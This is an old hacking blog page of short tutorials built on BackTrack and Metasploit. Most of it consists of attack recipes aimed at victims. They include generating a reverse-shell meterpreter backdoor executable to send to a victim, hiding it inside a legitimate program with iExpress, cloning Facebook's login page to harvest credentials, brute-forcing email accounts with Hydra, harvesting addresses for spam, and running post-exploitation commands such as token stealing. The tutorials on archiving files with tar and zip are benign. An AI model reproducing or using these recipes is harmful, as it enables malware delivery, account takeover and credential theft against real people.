Monday, March 11, 2013

How to open blocked websites in 1 step

1. This method is useful when you’re behind firewall:
ping <url>
Now you can try to copy the IP Address and then open it
2. This method is used when the url is BLOCKED:
Just type “httpS” instead of “http:” of “www”.

meterpreter Commands

Here is a list with some Meterpreter commands that can be used for post exploitation.
- screengrab
 Screenshot from victims computer
- run scriptname
 Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory
 - sysinfo
 Show the system information on the remote target
 - ls
 List the files and folders on the target
 - use priv
 Load the privilege extension for extended Meterpreter libraries
 - use incognito
 Load incognito functions. (Used for token stealing and impersonation on a target machine)

Dual Boot: BackTrack and Windows

This method of installation is the simplest way. I have made it in the assumption that you have a Windows installation that is taking up all the space on your disk drive and you would like to resize and repartition the disk drive in order to allow a BackTrack install alongside your Windows.


Burn it to a DVD or a flash drive, then place the DVD in your computer’s and reboot. The system will boot into a console and you will see a prompt choose 1st option. To boot into a Live KDE desktop, type startx and press the Enter key on your keyboard.

1. Once in the Live desktop, click on the Install BackTrack icon on the desktop.

Social Engineering

Kevin Mitnick was one of the most famous social engineers in the world—popularized the term “social engineering.”
Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.
“Albert Einstein once said, “Information is not knowledge.” That is a
powerful thought. Just reading this book will not somehow implant this
knowledge into your being. Apply the principles, practice what is taught in
these pages, and make the information a part of your daily life. When you do
that is when you will see this knowledge take effect.”
                                                                                                        Christopher Hadnagy
The first book to reveal and dissect the technical aspect of many social engineering maneuvers: Download here.

Linux Essentials Manual

The new LPI Linux Essentials exam was launched at LinuxTag this week and Linup Front released their e-book on Linux Essentials at the same time under a creative commons license.

The Linux Essentials defines the basic knowledge required to competently use a desktop or mobile device using a Linux Operating System.

The Linux Essentials certificate is slated to define the basic knowledge necessary to use a Linux computer productively, and through a corresponding education programme aid young people and adults new to the open source community in understanding Linux and open-source software in the context of the ITC industry.

Linux Essentials is a new certification by the Linux Professional Institute (LPI).

Commands, compressing files, networking, programming language and much more. Download here.

how to Backdoor Windows using metasploit

Follow these 4 simple steps and have fun.

1. Open a terminal and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=(YOUR IP) LPORT=(CHOOSE A PORT) x > /root/Desktop/CHOOSE_A_FILE_NAME.exe
Now that our exploit is done:
2. Go to Metasploit console by typing msfconsole and type:
3. Now send the file to victim and as soon as they download and open it, there’s meterpreter shell on victim computer.
Thats it!
**It is important to hide the exploit behind other file.
Click here to see how to bind a file.

How to bind using iExpress

In Windows:
1. Go to “Start” and hit “Run”.
2. Then type in “iexpress” and hit “Ok”.
3. Make sure the check box is on “Create new Self Extraction Directive file”, then hit “Next”.
4. Click on the checkbox “Extract files and run an instalation command”, then hit “Next”.
5. Then choose a name or just hit the space bar once, to make a space in the textbox, then hit “Next”.
6. Then make sure the checkbox is on “No Prompt”, then hit “Next”.
7. Then make the checkbox on “Do not display a license”, then hit “Next”.
8. Then hit “Add” on the iexpress box, and then a window should pop up, just browse your computer and find your Virus EXE, then hit “Open”.
9. Once your done with that, it should take you back to the iexpress window, then hit “Add” again. Browse your computer again but this time for your Program your wanting it to run after your botnet. Then hit “Open”.
10. Then after your done adding the botnet/virus and the program to the bind list, hit “Next”.
11. Now on the first drop down box (Install Program) put your Virus there.
12. Now select your program you want to run after the bot in the next drop down box. (Post Install Command). Then hit “Next”.
13. Now next select the checkbox “Hidden”, and hit “Next”.
14. Then select “No Message”, then hit “Next”.
15. Now select “Browse” and find where you want to save your new binded exe at, and then type a name for it and hit “Save”.
16. Now select the checkbox “Hide File Extracting Progress Animation from User”, then hit “Next”.
17. Then hit the checkbox “No restart”, and hit “Next”.
18. Then click “Dont Save” and hit “Next”.
19. Then hit the “Finish” button…
Enjoy your new binded exe.

Information Gathering: Email Harvester

Quick tutorial on how to extract email addresses from web sites.
Unlike search engines, email harvesters are only looking for email addresses. They are usually sent by spammers and any addresses they find are added to their spam database. Obviously this is a bad thing and you don’t want harvesters to find your address.
To deal with havesters, display the address using an image file so harvesters can’t see it. Users must manually enter the address into an email, you could also protect the page containing the address with a password, ”encode” the address using JavaScript or the most commom, use a contact form.
To prevent other people to harvest your email, do not post your email at the public area (forum, website etc) and disable “display email address” on your public profile.
Let’s cut the crap and start with the tutorial:
1. Go to Metasploit console by typing msfconsole, and then run:
msf> use gather/search_email_collector
2. Now you need to set up the domain you want to locate the email address then type “run” or “exploit” and wait for results as shown in snapshot:
# set DOMAIN
# run
As you can see harvester has found 3 emails from!

That’s it. . . now collect as many emails as you can and sell to spammers! Just kidding. . .

QR-Code Generator Attack Vector

QR Code is the trademark for a type of matrix barcode.
With this Backtrack QR Code Generator you could either create a code redirecting to your site or aQRCode with a URL (or your IP) then create a SET attack vector to assist with the attack.
1. Open SET toolkit
2. Choose Social-Engineering Attacks, then option 9 (QRCode Generator Attack Vector)
3. Now choose URL to redirect your QRCode, or your IP, with your fake site                                                     Don’t forget to write “http://before your IP
After that you’ll see a message that your QRCode has been generated.
Test your QRCode and hack some poor guy.

Hacking Email Accounts with Hydra

The purpose of this article is not to show how to hack email accounts, but to demonstrate the power of Hydra combined with  a strong wordlist.
Hydra is a tool that makes cracking protocols such as pop3,  ftp and telnet relatively easy. In my example, I will be cracking an email account (my own). Hydra uses brute force, so you HAVE to have the word in your wordlist in order to hack the email.

Wordlist Post

I’ll be hacking a pop3 email account but you can use other protocols, such as:
1. Open Hydra typing “xhydra” or go through menu.
2. On the Target tab, enter the target, the port, the protocol and check the options like below:
3. On the Passwords tab, enter the username (the email account you want to hack check password strength). Check the “Password List” button (then choose the path to your password list), “try login as password” and empty password options.

Word List – Brute Force

A dictionary attack using a wordlist relies on the fact that most users choose weak passwords. Very common passwords include password, computer, work, and most of the popular female names.
A wordlist can be used to to attempt a dictionary attack against any system which allows repetitive login attempts, such as SSH or POP3. But you already knew that. . . My word lists:

Social Engineering – set Toolkit – Facebook Hack

- Social Engineering: Understood to mean the art of manipulating people into performing actions or divulging confidential information.

I’m going to show you how to hack facebook account using backtrack 5. Just follow the steps.
1. Open your backtrack 5’s terminal and type cd /pentest/exploits/set (or go through start menu), then type ./set to open the Social Engineering Tool Kit SET
2. Select 1st option (1 – Social-Engineering Attacks) and hit enter. After that choose 2nd option “Website Attack Vectors” (as shown in snapshot)
3. Now just select 3rd Option “Credential Harvester Attack Method” and Hit ENTER.
4. Then select 2nd option “Site Cloner” and Hit ENTER.
5. Here you need to add the URL of Facebook (or the site you want to hack, like gmail, msn). Hit enter twice, you’ll see this message.
After adding the URL hit enter, wait set to clone the site and hit enter again.
6. Copy and Paste your IP adress in browser (How do I find my IP adress?)
7. Type test email and password to see whether it works or not.
8. Now just hit enter and switch back to terminal and see if the Email and Password appears.
Click here to see the video of this tutorial.
- tutorial for educational purpose only

How do I find my IP Address?

Open new terminal and just type ifconfig and hit ENTER
Your IP address should look like the following, as shown circled in red below:

That simple!

Compressing and Uncompressing files

This is a very simple, quick and easy way of compression (zipping) and decompression (extracting) files using command line.
First of all open terminal and go to the file folder.
# cd /home/user (go to the directory file was downloaded)
# ls (to make sure package is there)
To combine multiple files and/or directories into a single file, use the following command:
  • tar -cvf your_file.tar inputfile1 inputfile2
To extract an archive created by tar:
  • tar -xvf your_file.tar

Extracting gz and bz2
  • bz2 files: tar -jxvf nome-do-arquivo.tar.bz2
  • gz files: tar -zxvf nome-do-arquivo.tar.gz

    *v is for verbose mode
To unzip files use:
  • unzip <>
To zip:
  • zip <new_zip_file_name> <file_to_zip>
Example: I want to zip “backtrack.txt”
# zip backtrack.txt
For multiple files:
# zip backtrack(1).txt backtrack(2).txt backtrack(3).txt
The installation procedure for software that comes in tar.gz and tar.bz2 packages isn’t always the same, but usually it’s like this:
# tar xvzf package.tar.gz (or tar xvjf package.tar.bz2)
# cd package
# ./configure
# make
# make install
- if you got any doubts just ask